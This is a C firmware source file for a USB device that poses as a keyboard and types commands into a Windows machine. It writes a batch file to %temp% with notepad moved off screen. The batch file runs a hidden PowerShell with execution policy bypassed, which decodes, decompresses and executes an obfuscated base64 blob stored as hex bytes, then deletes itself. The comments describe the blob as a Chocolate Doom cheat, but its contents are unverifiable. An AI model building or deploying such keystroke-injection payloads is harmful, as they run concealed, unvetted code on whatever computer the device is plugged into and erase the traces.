/*
 *
 */

#include "char_to_keystroke.h"


char  keyStroke;

int   isUpperOrSpecial;
int   keyOut;
char  buf[1024] = {0};
char* pbuffer = (char*)buf;
int   i;

/*
 * This function uses keyboard commands to:
 * - open the start menu
 * - open the run promt
 * - open notepad with a file in the %temp% directory
 * - answer yes to the prompt to create a new file
 * - optionally move notepad off screen
 * - type out a payload
 * - save and close notepad
 * - open start menu again
 * - run the recently created and saved .bat file
 */
void ExecPayloadDelivery() {

   TM_USB_HIDDEVICE_Keyboard_t keyBoard;
   TM_USB_HIDDEVICE_Keyboard_t * kb = &keyBoard;

   TM_USB_HIDDEVICE_KeyboardStructInit(kb);
   TM_USB_HIDDEVICE_KeyboardReleaseAll();

   // windows key
   kb->L_GUI = TM_USB_HIDDEVICE_Button_Pressed;
   TM_USB_HIDDEVICE_KeyboardSend(kb);
   TM_USB_HIDDEVICE_KeyboardReleaseAll();
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);

   // this can be shortened to windows+r
   pbuffer = "run\0";
   while(pbuffer[i] != 0x00) {
         TM_USB_HIDDEVICE_KeyboardStructInit(kb);
         charToKeystroke(pbuffer[i], kb);
         TM_USB_HIDDEVICE_KeyboardSend(kb);
         TM_USB_HIDDEVICE_KeyboardReleaseAll();
         i++;
   }
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);


   // hit enter, wait for app
   TM_USB_HIDDEVICE_KeyboardStructInit(kb);
   kb->Key1 = kb_enter; // enter
   TM_USB_HIDDEVICE_KeyboardSend(kb);
   TM_USB_HIDDEVICE_KeyboardReleaseAll();
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);
   // end enter hit, app should be launched

   i = 0;
   pbuffer = "notepad %temp%/doomhack.bat\0";

   while(pbuffer[i] != 0x00) {
         TM_USB_HIDDEVICE_KeyboardStructInit(kb);
         charToKeystroke(pbuffer[i], kb);
         TM_USB_HIDDEVICE_KeyboardSend(kb);
         TM_USB_HIDDEVICE_KeyboardReleaseAll();
         i++;
   }
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);

   // hit enter, wait for app
   TM_USB_HIDDEVICE_KeyboardStructInit(kb);
   kb->Key1 = kb_enter; // enter
   TM_USB_HIDDEVICE_KeyboardSend(kb);
   TM_USB_HIDDEVICE_KeyboardReleaseAll();
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);
   // end enter hit, app should be launched

   /*
    * there will be a save prompt for the new file, hit enter again.
    */
   // hit enter, wait for app to open
   TM_USB_HIDDEVICE_KeyboardStructInit(kb);
   kb->Key1 = kb_enter; // enter
   TM_USB_HIDDEVICE_KeyboardSend(kb);
   TM_USB_HIDDEVICE_KeyboardReleaseAll();
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);
   // end enter hit, app should be launched



   // this code uses alt+space+m and arrow keys to move the window
   // change the hal_delay time to control how far the window moves
   TM_USB_HIDDEVICE_KeyboardStructInit(kb);
   kb->L_ALT = TM_USB_HIDDEVICE_Button_Pressed;
   kb->Key1 = kb_space;
   kb->Key2 = kb_m;
   TM_USB_HIDDEVICE_KeyboardSend(kb);
   TM_USB_HIDDEVICE_KeyboardReleaseAll();

   TM_USB_HIDDEVICE_KeyboardStructInit(kb);
   kb->Key1 = kb_down;
   TM_USB_HIDDEVICE_KeyboardSend(kb);
   HAL_Delay(1000); // increase this to ensure the window moves off screen
   TM_USB_HIDDEVICE_KeyboardReleaseAll();

   TM_USB_HIDDEVICE_KeyboardStructInit(kb);
   kb->Key1 = kb_enter;
   TM_USB_HIDDEVICE_KeyboardSend(kb);
   TM_USB_HIDDEVICE_KeyboardReleaseAll();
   HAL_Delay(LAUNCH_DELAY);

   TM_USB_HIDDEVICE_KeyboardStructInit(kb);
   TM_USB_HIDDEVICE_KeyboardReleaseAll();

   /*
    * type the hack shell code
    * the contents of hackbuf[] are will be typed into whatever window is in focus
    * the code currently in there is a powershell executed compressed program that unlocks
    * weapons and provides unlimited ammo in Chocolate Doom.
    *
    * or change it if you don't trust random compressed shell code executing on your computer :)
    */

   char hackbuf[] = { 0x73,  0x74,  0x61,  0x72,  0x74,  0x20,  0x70,  0x6f, 0x77,  0x65,  0x72,  0x73,  0x68,  0x65,  0x6c,  0x6c,  0x2e,         0x65,  0x78,  0x65,  0x20,  0x2d,  0x4e,  0x6f,  0x50,  0x20,         0x2d,  0x4e,  0x6f,  0x6e,  0x49,  0x20,  0x2d,  0x57,  0x20,         0x48,  0x69,  0x64,  0x64,  0x65,  0x6e,  0x20,  0x2d,  0x45,         0x78,  0x65,  0x63,  0x20,  0x42,  0x79,  0x70,  0x61,  0x73,         0x73,  0x20,  0x2d,  0x43,  0x6f,  0x6d,  0x6d,  0x61,  0x6e,         0x64,  0x20,  0x22,  0x24,  0x64,  0x3d,  0x5b,  0x53,  0x79,         0x73,  0x74,  0x65,  0x6d,  0x2e,  0x43,  0x6f,  0x6e,  0x76,         0x65,  0x72,  0x74,  0x5d,  0x3a,  0x3a,  0x46,  0x72,  0x6f,         0x6d,  0x42,  0x61,  0x73,  0x65,  0x36,  0x34,  0x53,  0x74,         0x72,  0x69,  0x6e,  0x67,  0x28,  0x27,  0x48,  0x34,  0x73,         0x49,  0x41,  0x41,  0x41,  0x41,  0x41,  0x41,  0x41,  0x45,         0x41,  0x4b,  0x31,  0x57,  0x66,  0x32,  0x2f,  0x62,  0x4e,         0x68,  0x44,  0x39,  0x50,  0x30,  0x43,  0x2b,  0x41,  0x32,         0x63,  0x45,  0x71,  0x49,  0x67,  0x71,  0x67,  0x69,  0x77,         0x35,  0x52,  0x57,  0x74,  0x4f,  0x52,  0x5a,  0x4e,  0x34,         0x57,  0x59,  0x50,  0x47,  0x53,  0x42,  0x43,  0x33,  0x61,         0x44,  0x63,  0x6a,  0x47,  0x47,  0x69,  0x4a,  0x73,  0x59,         0x68,  0x49,  0x6c,  0x45,  0x5a,  0x52,  0x56,  0x67,  0x7a,         0x58,  0x33,  0x37,  0x31,  0x48,  0x2f,  0x55,  0x67,  0x55,         0x31,  0x55,  0x37,  0x63,  0x59,  0x51,  0x5a,  0x4d,  0x6b,         0x61,  0x66,  0x6a,  0x34,  0x37,  0x76,  0x48,  0x30,  0x35,         0x45,  0x48,  0x4e,  0x4d,  0x74,  0x59,  0x50,  0x49,  0x73,         0x34,  0x79,  0x35,  0x43,  0x48,  0x50,  0x72,  0x7a,  0x61,         0x33,  0x33,  0x76,  0x31,  0x59,  0x58,  0x2f,  0x76,  0x49,         0x45,  0x74,  0x79,  0x36,  0x54,  0x4e,  0x74,  0x36,  0x65,         0x33,  0x76,  0x35,  0x52,  0x6b,  0x58,  0x63,  0x7a,  0x52,         0x5a,  0x5a,  0x6f,  0x72,  0x46,  0x70,  0x44,  0x32,  0x77,         0x72,  0x6e,  0x4f,  0x68,  0x65,  0x4d,  0x79,  0x73,  0x63,         0x36,  0x47,  0x59,  0x54,  0x4e,  0x49,  0x4a,  0x6b,  0x77,         0x76,  0x75,  0x73,  0x34,  0x77,  0x49,  0x47,  0x72,  0x4d,         0x73,  0x70,  0x59,  0x41,  0x51,  0x72,  0x4e,  0x49,  0x63,         0x30,  0x48,  0x33,  0x6b,  0x52,  0x37,  0x41,  0x53,  0x53,         0x6c,  0x66,  0x54,  0x69,  0x5a,  0x4b,  0x35,  0x72,  0x79,         0x37,  0x6f,  0x4d,  0x73,  0x6d,  0x56,  0x55,  0x54,  0x30,         0x2b,  0x63,  0x52,  0x46,  0x59,  0x45,  0x2f,  0x5a,  0x76,         0x7a,  0x67,  0x43,  0x4f,  0x52,  0x76,  0x67,  0x6d,  0x4b,         0x33,  0x33,  0x51,  0x31,  0x59,  0x6f,  0x4c,  0x68,  0x62, 0x34,  0x52,  0x33,  0x66,  0x35,  0x46,  0x31,  0x72,  0x38, 0x79,  0x64,  0x64,  0x79,  0x73,  0x43,  0x39,  0x53,  0x75, 0x6c,  0x45,  0x51,  0x68,  0x71,  0x63,  0x64,  0x66,  0x77, 0x4f,  0x41,  0x36,  0x4b,  0x43,  0x5a,  0x50,  0x33,  0x78, 0x65,  0x64,  0x63,  0x64,  0x72,  0x78,  0x56,  0x38,  0x33,  0x34,  0x43,  0x71,  0x55,  0x4b,  0x71,  0x49,  0x79,  0x69,  0x36,  0x44,  0x78,  0x4f,  0x45,  0x36,  0x6d,  0x4d,  0x58,  0x70,  0x34,  0x78,  0x36,  0x54,  0x70,  0x57,  0x45,  0x45,  0x55,  0x39,  0x45,  0x30,  0x30,  0x59,  0x38,  0x4d,  0x76,  0x55,  0x48,  0x31,  0x49,  0x6d,  0x45,  0x75,  0x51,  0x44,  0x4d,  0x6b,  0x78,  0x7a,  0x6f,  0x67,  0x71,  0x6d,  0x73,  0x6e,  0x74,  0x51,  0x53,  0x54,  0x51,  0x72,  0x6e,  0x41,  0x48,  0x7a,  0x72,  0x2f,  0x42,  0x50,  0x43,  0x71,  0x4f,  0x32,  0x2b,  0x43,  0x59,  0x43,  0x39,  0x6c,  0x72,  0x65,  0x41,  0x70,  0x4d,  0x74,  0x4b,  0x32,  0x77,  0x42,  0x2b,  0x35,  0x4f,  0x70,  0x43,  0x75,  0x74,  0x7a,  0x4b,  0x42,  0x6b,  0x4e,  0x72,  0x6d,  0x51,  0x43,  0x32,  0x35,  0x43,  0x64,  0x42,  0x77,  0x31,  0x30,  0x61,  0x43,  0x49,  0x51,  0x43,  0x2b,  0x56,  0x61,  0x79,  0x58,  0x51,  0x72,  0x2b,  0x42,  0x62,  0x36,  0x55,  0x38,  0x6c,  0x55,  0x4c,  0x73,  0x55,  0x51,  0x6a,  0x61,  0x6e,  0x4d,  0x51,  0x68,  0x6f,  0x64,  0x5a,  0x38,  0x59,  0x58,  0x45,  0x56,  0x4e,  0x42,  0x35,  0x79,  0x7a,  0x34,  0x76,  0x45,  0x79,  0x5a,  0x64,  0x5a,  0x49,  0x6b,  0x55,  0x5a,  0x66,  0x59,  0x44,  0x47,  0x7a,  0x6f,  0x6d,  0x73,  0x30,  0x35,  0x4a,  0x49,  0x72,  0x38,  0x6d,  0x4b,  0x68,  0x50,  0x62,  0x4e,  0x6b,  0x69,  0x6f,  0x33,  0x6c,  0x77,  0x73,  0x2b,  0x49,  0x54,  0x31,  0x38,  0x2f,  0x46,  0x33,  0x56,  0x4e,  0x69,  0x64,  0x77,  0x44,  0x44,  0x6f,  0x75,  0x66,  0x6a,  0x76,  0x6b,  0x79,  0x5a,  0x71,  0x49,  0x4d,  0x31,  0x53,  0x70,  0x43,  0x67,  0x77,  0x70,  0x36,  0x5a,  0x4c,  0x38,  0x58,  0x61,  0x42,  0x64,  0x54,  0x65,  0x6f,  0x4f,  0x49,  0x59,  0x6b,  0x43,  0x41,  0x75,  0x51,  0x36,  0x73,  0x31,  0x31,  0x74,  0x51,  0x65,  0x4f,  0x5a,  0x65,  0x41,  0x74,  0x36,  0x4c,  0x70,  0x78,  0x4d,  0x2b,  0x77,  0x33,  0x53,  0x6b,  0x50,  0x61,  0x6f,  0x55,  0x65,  0x64,  0x6d,  0x76,  0x4d,  0x34,  0x6b,  0x53,  0x32,  0x52,  0x4b,  0x6f,  0x37,  0x31,  0x4a,  0x78,  0x65,  0x35,  0x75,  0x6f,  0x47,  0x7a,  0x5a,  0x61,  0x4b,  0x54,  0x65,  0x46,  0x68,  0x36,  0x74,  0x55,  0x7a,  0x55,  0x78,  0x4f,  0x73,  0x50,  0x65,  0x54,  0x2f,  0x77,  0x75,  0x53,  0x72,  0x35,  0x49,  0x71,  0x39,  0x52,  0x4f,  0x55,  0x4a,  0x43,  0x64,  0x45,  0x6d,  0x55,  0x66,  0x77,  0x36,  0x69,  0x66,  0x2b,  0x65,  0x56,  0x36,  0x64,  0x52,  0x6b,  0x72,  0x47,  0x50,  0x56,  0x41,  0x51,  0x52,  0x65,  0x79,  0x43,  0x4a,  0x53,  0x65,  0x32,  0x34,  0x53,  0x48,  0x69,  0x41,  0x4f,  0x48,  0x31,  0x38,  0x73,  0x57,  0x72,  0x6f,  0x65,  0x37,  0x55,  0x4e,  0x32,  0x2f,  0x65,  0x32,  0x66,  0x57,  0x53,  0x66,  0x48,  0x59,  0x30,  0x47,  0x70,  0x4e,  0x47,  0x51,  0x31,  0x4b,  0x45,  0x74,  0x76,  0x4a,  0x57,  0x39,  0x4a,  0x76,  0x77,  0x57,  0x47,  0x54,  0x39,  0x76,  0x54,  0x57,  0x68,  0x53,  0x63,  0x32,  0x48,  0x32,  0x79,  0x37,  0x41,  0x6c,  0x39,  0x72,  0x78,  0x62,  0x47,  0x6d,  0x55,  0x4d,  0x56,  0x31,  0x47,  0x55,  0x55,  0x78,  0x5a,  0x54,  0x2b,  0x2b,  0x5a,  0x33,  0x78,  0x37,  0x61,  0x78,  0x37,  0x72,  0x78,  0x2b,  0x54,  0x54,  0x5a,  0x6f,  0x2b,  0x68,  0x53,  0x44,  0x72,  0x4e,  0x75,  0x6b,  0x38,  0x77,  0x32,  0x6b,  0x70,  0x56,  0x64,  0x31,  0x72,  0x4c,  0x2b,  0x68,  0x77,  0x70,  0x4b,  0x4e,  0x6b,  0x51,  0x7a,  0x63,  0x4d,  0x39,  0x66,  0x74,  0x4e,  0x77,  0x46,  0x77,  0x43,  0x4f,  0x44,  0x65,  0x65,  0x57,  0x66,  0x61,  0x39,  0x32,  0x39,  0x50,  0x6f,  0x58,  0x6c,  0x6e,  0x51,  0x33,  0x4d,  0x38,  0x4d,  0x4c,  0x58,  0x6a,  0x59,  0x37,  0x4e,  0x75,  0x76,  0x47,  0x66,  0x61,  0x75,  0x2f,  0x52,  0x35,  0x70,  0x6c,  0x6e,  0x76,  0x4a,  0x67,  0x37,  0x6b,  0x42,  0x31,  0x71,  0x59,  0x71,  0x46,  0x2f,  0x56,  0x6d,  0x67,  0x65,  0x42,  0x30,  0x50,  0x66,  0x76,  0x45,  0x45,  0x55,  0x37,  0x6a,  0x4b,  0x35,  0x6b,  0x79,  0x50,  0x4f,  0x51,  0x58,  0x67,  0x64,  0x76,  0x30,  0x59,  0x75,  0x62,  0x33,  0x4c,  0x70,  0x67,  0x59,  0x71,  0x37,  0x43,  0x42,  0x70,  0x6f,  0x77,  0x44,  0x62,  0x7a,  0x46,  0x66,  0x57,  0x62,  0x4f,  0x47,  0x76,  0x64,  0x4e,  0x4b,  0x76,  0x74,  0x46,  0x71,  0x78,  0x44,  0x70,  0x77,  0x42,  0x44,  0x48,  0x71,  0x79,  0x72,  0x41,  0x4b,  0x6a,  0x35,  0x4e,  0x79,  0x65,  0x4f,  0x4e,  0x31,  0x67,  0x55,  0x73,  0x6f,  0x70,  0x6a,  0x59,  0x76,  0x4a,  0x65,  0x6f,  0x6b,  0x31,  0x46,  0x76,  0x48,  0x50,  0x74,  0x68,  0x64,  0x2b,  0x75,  0x4a,  0x73,  0x48,  0x70,  0x39,  0x64,  0x4c,  0x52,  0x4a,  0x6a,  0x43,  0x6b,  0x58,  0x52,  0x6c,  0x58,  0x74,  0x51,  0x56,  0x63,  0x71,  0x35,  0x78,  0x6c,  0x65,  0x62,  0x61,  0x79,  0x57,  0x70,  0x57,  0x43,  0x41,  0x32,  0x49,  0x65,  0x64,  0x63,  0x47,  0x31,  0x4d,  0x58,  0x6e,  0x62,  0x71,  0x37,  0x2b,  0x4c,  0x6b,  0x37,  0x4f,  0x4c,  0x6b,  0x37,  0x75,  0x49,  0x30,  0x32,  0x4d,  0x58,  0x70,  0x61,  0x41,  0x65,  0x6e,  0x6b,  0x78,  0x4e,  0x4d,  0x6f,  0x4f,  0x53,  0x53,  0x49,  0x75,  0x54,  0x77,  0x57,  0x58,  0x64,  0x71,  0x63,  0x57,  0x79,  0x32,  0x4a,  0x30,  0x42,  0x61,  0x34,  0x74,  0x38,  0x38,  0x47,  0x36,  0x39,  0x30,  0x42,  0x73,  0x56,  0x57,  0x37,  0x48,  0x6d,  0x67,  0x76,  0x39,  0x74,  0x33,  0x38,  0x4b,  0x71,  0x71,  0x2b,  0x67,  0x39,  0x37,  0x35,  0x2f,  0x31,  0x30,  0x79,  0x6c,  0x59,  0x41,  0x76,  0x64,  0x48,  0x6c,  0x35,  0x52,  0x68,  0x4e,  0x51,  0x69,  0x70,  0x5a,  0x41,  0x58,  0x39,  0x30,  0x69,  0x45,  0x37,  0x44,  0x78,  0x45,  0x38,  0x69,  0x43,  0x74,  0x6b,  0x77,  0x53,  0x70,  0x49,  0x59,  0x4f,  0x5a,  0x5a,  0x6a,  0x39,  0x58,  0x73,  0x59,  0x55,  0x74,  0x51,  0x6f,  0x6e,  0x75,  0x61,  0x75,  0x6e,  0x38,  0x42,  0x4e,  0x51,  0x2b,  0x53,  0x4d,  0x62,  0x44,  0x31,  0x7a,  0x69,  0x79,  0x70,  0x4c,  0x34,  0x65,  0x78,  0x70,  0x38,  0x73,  0x78,  0x72,  0x6e,  0x31,  0x4d,  0x67,  0x78,  0x31,  0x75,  0x49,  0x49,  0x4d,  0x56,  0x6c,  0x2f,  0x6f,  0x64,  0x62,  0x30,  0x50,  0x57,  0x39,  0x6f,  0x2f,  0x38,  0x47,  0x33,  0x62,  0x48,  0x6c,  0x50,  0x33,  0x34,  0x53,  0x4d,  0x4d,  0x2b,  0x6f,  0x44,  0x4e,  0x67,  0x6f,  0x7a,  0x7a,  0x6b,  0x63,  0x57,  0x2b,  0x6e,  0x37,  0x39,  0x7a,  0x41,  0x6b,  0x57,  0x63,  0x47,  0x56,  0x48,  0x79,  0x4b,  0x6a,  0x63,  0x63,  0x51,  0x72,  0x6e,  0x38,  0x4b,  0x6e,  0x6f,  0x65,  0x55,  0x63,  0x51,  0x68,  0x47,  0x45,  0x73,  0x6a,  0x67,  0x44,  0x64,  0x6e,  0x65,  0x6b,  0x74,  0x72,  0x72,  0x32,  0x4d,  0x4e,  0x39,  0x67,  0x37,  0x51,  0x2f,  0x68,  0x71,  0x77,  0x68,  0x42,  0x31,  0x59,  0x37,  0x64,  0x71,  0x65,  0x7a,  0x39,  0x72,  0x74,  0x32,  0x74,  0x37,  0x45,  0x37,  0x58,  0x50,  0x71,  0x6a,  0x73,  0x62,  0x74,  0x64,  0x2b,  0x56,  0x4e,  0x6b,  0x48,  0x6a,  0x58,  0x33,  0x64,  0x72,  0x75,  0x44,  0x41,  0x5a,  0x71,  0x31,  0x2f,  0x2b,  0x33,  0x73,  0x39,  0x75,  0x48,  0x73,  0x65,  0x42,  0x38,  0x47,  0x68,  0x72,  0x76,  0x37,  0x6f,  0x38,  0x4a,  0x72,  0x64,  0x4d,  0x73,  0x6d,  0x45,  0x7a,  0x34,  0x4c,  0x6a,  0x78,  0x30,  0x76,  0x71,  0x51,  0x64,  0x6c,  0x48,  0x70,  0x63,  0x75,  0x49,  0x33,  0x58,  0x4c,  0x42,  0x46,  0x55,  0x38,  0x45,  0x4f,  0x70,  0x68,  0x55,  0x4e,  0x39,  0x62,  0x44,  0x43,  0x79,  0x72,  0x6d,  0x4f,  0x57,  0x51,  0x4e,  0x4f,  0x74,  0x57,  0x37,  0x6d,  0x2b,  0x37,  0x76,  0x54,  0x51,  0x4d,  0x72,  0x76,  0x52,  0x6b,  0x4f,  0x79,  0x77,  0x2b,  0x75,  0x4e,  0x2b,  0x76,  0x68,  0x48,  0x79,  0x76,  0x62,  0x34,  0x56,  0x72,  0x79,  0x43,  0x67,  0x41,  0x41,  0x27,  0x29,  0x3b,  0x24,  0x6d,  0x73,  0x3d,  0x4e,  0x65,  0x77,  0x2d,  0x4f,  0x62,  0x6a,  0x65,  0x63,  0x74,  0x20,  0x53,  0x79,  0x73,  0x74,  0x65,  0x6d,  0x2e,  0x49,  0x4f,  0x2e,  0x4d,  0x65,  0x6d,  0x6f,  0x72,  0x79,  0x53,  0x74,  0x72,  0x65,  0x61,  0x6d,  0x3b,  0x24,  0x6d,  0x73,  0x2e,  0x57,  0x72,  0x69,  0x74,  0x65,  0x28,  0x24,  0x64,  0x2c,  0x20,  0x30,  0x2c,  0x20,  0x24,  0x64,  0x2e,  0x4c,  0x65,  0x6e,  0x67,  0x74,  0x68,  0x29,  0x3b,  0x24,  0x6d,  0x73,  0x2e,  0x53,  0x65,  0x65,  0x6b,  0x28,  0x30,  0x2c,  0x30,  0x29,  0x7c,  0x4f,  0x75,  0x74,  0x2d,  0x4e,  0x75,  0x6c,  0x6c,  0x3b,  0x24,  0x63,  0x73,  0x3d,  0x4e,  0x65,  0x77,  0x2d,  0x4f,  0x62,  0x6a,  0x65,  0x63,  0x74,  0x20,  0x53,  0x79,  0x73,  0x74,  0x65,  0x6d,  0x2e,  0x49,  0x4f,  0x2e,  0x43,  0x6f,  0x6d,  0x70,  0x72,  0x65,  0x73,  0x73,  0x69,  0x6f,  0x6e,  0x2e,  0x47,  0x5a,  0x69,  0x70,  0x53,  0x74,  0x72,  0x65,  0x61,  0x6d,  0x28,  0x24,  0x6d,  0x73,  0x2c,  0x20,  0x5b,  0x53,  0x79,  0x73,  0x74,  0x65,  0x6d,  0x2e,  0x49,  0x4f,  0x2e,  0x43,  0x6f,  0x6d,  0x70,  0x72,  0x65,  0x73,  0x73,  0x69,  0x6f,  0x6e,  0x2e,  0x43,  0x6f,  0x6d,  0x70,  0x72,  0x65,  0x73,  0x73,  0x69,  0x6f,  0x6e,  0x4d,  0x6f,  0x64,  0x65,  0x5d,  0x3a,  0x3a,  0x44,  0x65,  0x63,  0x6f,  0x6d,  0x70,  0x72,  0x65,  0x73,  0x73,  0x29,  0x3b,  0x24,  0x73,  0x72,  0x3d,  0x4e,  0x65,  0x77,  0x2d,  0x4f,  0x62,  0x6a,  0x65,  0x63,  0x74,  0x20,  0x53,  0x79,  0x73,  0x74,  0x65,  0x6d,  0x2e,  0x49,  0x4f,  0x2e,  0x53,  0x74,  0x72,  0x65,  0x61,  0x6d,  0x52,  0x65,  0x61,  0x64,  0x65,  0x72,  0x28,  0x24,  0x63,  0x73,  0x29,  0x3b,  0x24,  0x74,  0x3d,  0x24,  0x73,  0x72,  0x2e,  0x72,  0x65,  0x61,  0x64,  0x74,  0x6f,  0x65,  0x6e,  0x64,  0x28,  0x29,  0x3b,  0x69,  0x65,  0x78,  0x20,  0x24,  0x74,  0x22, 0x00 };

   i = 0;
   while(hackbuf[i] != 0x00) {
         TM_USB_HIDDEVICE_KeyboardStructInit(kb);
         charToKeystroke(hackbuf[i], kb);
         TM_USB_HIDDEVICE_KeyboardSend(kb);
         TM_USB_HIDDEVICE_KeyboardReleaseAll();
         i++;
   }

   TM_USB_HIDDEVICE_KeyboardStructInit(kb);
   kb->Key1 = kb_enter; // enter
   TM_USB_HIDDEVICE_KeyboardSend(kb);
   TM_USB_HIDDEVICE_KeyboardReleaseAll();

   pbuffer = "DEL \"%~f0\"\0";
   i = 0;
   while(pbuffer[i] != 0x00) {
         TM_USB_HIDDEVICE_KeyboardStructInit(kb);
         charToKeystroke(pbuffer[i], kb);
         TM_USB_HIDDEVICE_KeyboardSend(kb);
         TM_USB_HIDDEVICE_KeyboardReleaseAll();
         i++;
   }
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);





   HAL_Delay(LAUNCH_DELAY);

   /*
    * save the file
    */
   TM_USB_HIDDEVICE_KeyboardStructInit(kb);
   kb->L_CTRL = TM_USB_HIDDEVICE_Button_Pressed; // enter
   kb->Key2 = kb_s;
   TM_USB_HIDDEVICE_KeyboardSend(kb);
   TM_USB_HIDDEVICE_KeyboardReleaseAll();
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);
   /*
    * close the window
    */
   TM_USB_HIDDEVICE_KeyboardStructInit(kb);
   kb->L_ALT = TM_USB_HIDDEVICE_Button_Pressed; // enter
   kb->Key2 = kb_f4;
   TM_USB_HIDDEVICE_KeyboardSend(kb);
   TM_USB_HIDDEVICE_KeyboardReleaseAll();
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);

   /*
    * windows key
    */
   TM_USB_HIDDEVICE_KeyboardStructInit(kb);
   kb->L_GUI = TM_USB_HIDDEVICE_Button_Pressed;
   TM_USB_HIDDEVICE_KeyboardSend(kb);
   TM_USB_HIDDEVICE_KeyboardReleaseAll();
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);

   /*
    * run
    */
   i = 0;
   pbuffer = "run\0";
   while(pbuffer[i] != 0x00) {
         TM_USB_HIDDEVICE_KeyboardStructInit(kb);
         charToKeystroke(pbuffer[i], kb);
         TM_USB_HIDDEVICE_KeyboardSend(kb);
         TM_USB_HIDDEVICE_KeyboardReleaseAll();
         i++;
   }
   HAL_Delay(LAUNCH_DELAY);

   /*
    * enter
    */
   TM_USB_HIDDEVICE_KeyboardStructInit(kb);
   kb->Key1 = kb_enter; // enter
   TM_USB_HIDDEVICE_KeyboardSend(kb);
   TM_USB_HIDDEVICE_KeyboardReleaseAll();
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);
   HAL_Delay(LAUNCH_DELAY);
   // end enter hit, app should be launched

   /*
    * exec bat
    */
   i = 0;
   pbuffer = "%temp%/doomhack.bat\0";
   while(pbuffer[i] != 0x00) {
         TM_USB_HIDDEVICE_KeyboardStructInit(kb);
         charToKeystroke(pbuffer[i], kb);
         TM_USB_HIDDEVICE_KeyboardSend(kb);
         TM_USB_HIDDEVICE_KeyboardReleaseAll();
         i++;
   }
   HAL_Delay(LONG_DELAY);
   HAL_Delay(LAUNCH_DELAY);

   /*
    * enter
    */
   TM_USB_HIDDEVICE_KeyboardStructInit(kb);
   kb->Key1 = kb_enter; // enter
   TM_USB_HIDDEVICE_KeyboardSend(kb);
   TM_USB_HIDDEVICE_KeyboardReleaseAll();
   HAL_Delay(LAUNCH_DELAY);
   // end enter hit, bat should be launched
   TM_USB_HIDDEVICE_KeyboardReleaseAll();


}

/*
 *
 */
void charToKeystroke(char keyIn, TM_USB_HIDDEVICE_Keyboard_t * kb) {

   // Clear keys
   TM_USB_HIDDEVICE_KeyboardStructInit(kb);

   // Upper case ASCII
   if(( (int)keyIn >='A') && (int)keyIn <= 'Z') {
      kb->Key1 = keyIn - 61;
      kb->L_SHIFT = TM_USB_HIDDEVICE_Button_Pressed;
   }

   // Lower case ASCII
   else if(( (int)keyIn >='a') && (int)keyIn <= 'z') {
      keyToUpper = toupper(keyIn);
      kb->Key1 = keyToUpper - 61;
   }

   // Special characters
   else if( (int)keyIn == '{' ) { // {
      kb->Key1 = kb_leftbracket;
      kb->L_SHIFT = TM_USB_HIDDEVICE_Button_Pressed;
   }
   else if( (int)keyIn == '}' ) { // }
      kb->Key1 = kb_rightbracket;
      kb->L_SHIFT = TM_USB_HIDDEVICE_Button_Pressed;
   }
   else if( (int)keyIn == '[' ) { // {
      kb->Key1 = kb_leftbracket;
   }
   else if( (int)keyIn == ']' ) { // }
      kb->Key1 = kb_rightbracket;
   }
   else if( (int)keyIn == '(') { // (
      kb->Key1 = kb_9;
      kb->L_SHIFT = TM_USB_HIDDEVICE_Button_Pressed;
   }
   else if( (int)keyIn == ')') { // )
      kb->Key1 = kb_0;
      kb->L_SHIFT = TM_USB_HIDDEVICE_Button_Pressed;
   }
   else if( (int)keyIn == '$') { // $
      kb->Key1 = kb_4;
      kb->L_SHIFT = TM_USB_HIDDEVICE_Button_Pressed;
   }


   else if( (int)keyIn >= '1' && (int)keyIn <= '9' ) { // 1-9
      kb->Key1 = keyIn - 19;
   }
   else if( (int)keyIn == '0' ) { // 0
      kb->Key1 = kb_0;
   }
   else if( (int)keyIn == ':') { // :
      kb->Key1 = kb_colon;
      kb->L_SHIFT = TM_USB_HIDDEVICE_Button_Pressed;
   }
   else if( (int)keyIn == ';') { // ;
      kb->Key1 = kb_colon;
   }
   else if( (int)keyIn == '\'') {
      kb->Key1 = kb_quote;
   }
   else if( (int)keyIn == '\"') {
      kb->Key1 = kb_quote;
      kb->L_SHIFT = TM_USB_HIDDEVICE_Button_Pressed;
   }
   else if( (int)keyIn == '~') {
      kb->Key1 = kb_tilde;
      kb->L_SHIFT = TM_USB_HIDDEVICE_Button_Pressed;
   }
   else if( (int)keyIn == ',') {
      kb->Key1 = kb_comma;
   }
   else if( (int)keyIn == '.') {
      kb->Key1 = kb_period;
   }
   else if( (int)keyIn == '-') {
      kb->Key1 = kb_dash;
   }
   else if( (int)keyIn == '_') {
      kb->Key1 = kb_dash;
      kb->L_SHIFT = TM_USB_HIDDEVICE_Button_Pressed;
   }
   else if( (int)keyIn == '/') {
      kb->Key1 = kb_slashquestion;
   }
   else if( (int)keyIn == '?') {
      kb->Key1 = kb_slashquestion;
      kb->L_SHIFT = TM_USB_HIDDEVICE_Button_Pressed;
   }
   else if( (int)keyIn == '+') {
      kb->Key1 = kb_equals;
      kb->L_SHIFT = TM_USB_HIDDEVICE_Button_Pressed;
   }
   else if( (int)keyIn == '=') {
      kb->Key1 = kb_equals;
   }
   else if( (int)keyIn == ' ') {
      kb->Key1 = kb_space;
   }
   else if ( (int)keyIn == 0x10) {
      kb->Key1 = kb_enter;
   }
   else if( (int)keyIn == '%') {
      kb->Key1 = kb_5;
      kb->L_SHIFT = TM_USB_HIDDEVICE_Button_Pressed;
   }
   else if( (int)keyIn == '|') {
      kb->Key1 = kb_slashpipe;
      kb->L_SHIFT = TM_USB_HIDDEVICE_Button_Pressed;
   }
}

/*
 *
 */
